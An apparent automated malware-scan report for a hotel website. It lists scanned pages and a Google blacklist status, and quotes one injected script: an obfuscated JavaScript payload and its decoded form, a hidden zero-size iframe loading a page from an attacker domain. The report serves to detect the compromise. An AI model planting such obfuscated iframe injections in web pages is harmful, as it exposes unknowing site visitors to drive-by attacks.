New scan:

Malware Scanner report for hotel-felix.com

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "hotel-felix.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=hotel-felix.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://hotel-felix.com/
200 OK
Content-Length: 3321
Content-Type: text/html
clean
http://hotel-felix.com/hotel.php?lang=fr
200 OK
Content-Length: 6068
Content-Type: text/html
clean
http://hotel-felix.com/fblibsilver.js
200 OK
Content-Length: 4378
Content-Type: application/x-javascript
clean
http://hotel-felix.com/hotel.php?page=accueil&lang=fr
200 OK
Content-Length: 6068
Content-Type: text/html
clean
http://hotel-felix.com/hotel.php?page=chambre&lang=fr
200 OK
Content-Length: 6514
Content-Type: text/html
clean
http://hotel-felix.com/hotel.php?page=tarif&lang=fr
200 OK
Content-Length: 11900
Content-Type: text/html
clean
http://hotel-felix.com/hotel.php?page=reservation&lang=fr
200 OK
Content-Length: 11514
Content-Type: text/html
clean
http://hotel-felix.com/fbtrack.js
200 OK
Content-Length: 920
Content-Type: application/x-javascript
clean
http://hotel-felix.com/hotel.php?page=plan&lang=fr
200 OK
Content-Length: 7530
Content-Type: text/html
clean
http://hotel-felix.com/images/full/photo10.jpg
200 OK
Content-Length: 26088
Content-Type: image/jpeg
clean
http://hotel-felix.com/test404page.js
404 Not Found
Content-Length: 3348
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: private3.zapto.org

var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62c
...[1839 bytes skipped]...

Decoded script:


document.write(unescape(WSxQJgvuB))
document.write(unescape(WSxQJgvuB))
<iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&amp;hrytewsfd=9889439&amp;yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe>

http://hotel-felix.com/images/full/photo11.jpg
200 OK
Content-Length: 41952
Content-Type: image/jpeg
clean
http://hotel-felix.com/images/full/photo12.jpg
200 OK
Content-Length: 44269
Content-Type: image/jpeg
clean
http://hotel-felix.com/images/full/photo4.jpg
200 OK
Content-Length: 31860
Content-Type: image/jpeg
clean
http://hotel-felix.com/images/full/photo5.jpg
200 OK
Content-Length: 30946
Content-Type: image/jpeg
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: hotel-felix.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 13 Jun 2014 02:49:05 GMT
Server: Apache/2.0.52 (CentOS)
Content-Length: 3321
Content-Type: text/html
X-Powered-By: PHP/4.3.9

...3321 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hotel-felix.com
Referer: http://www.google.com/search?q=hotel-felix.com

Result:
The result is similar to the first query. There are no suspicious redirects found.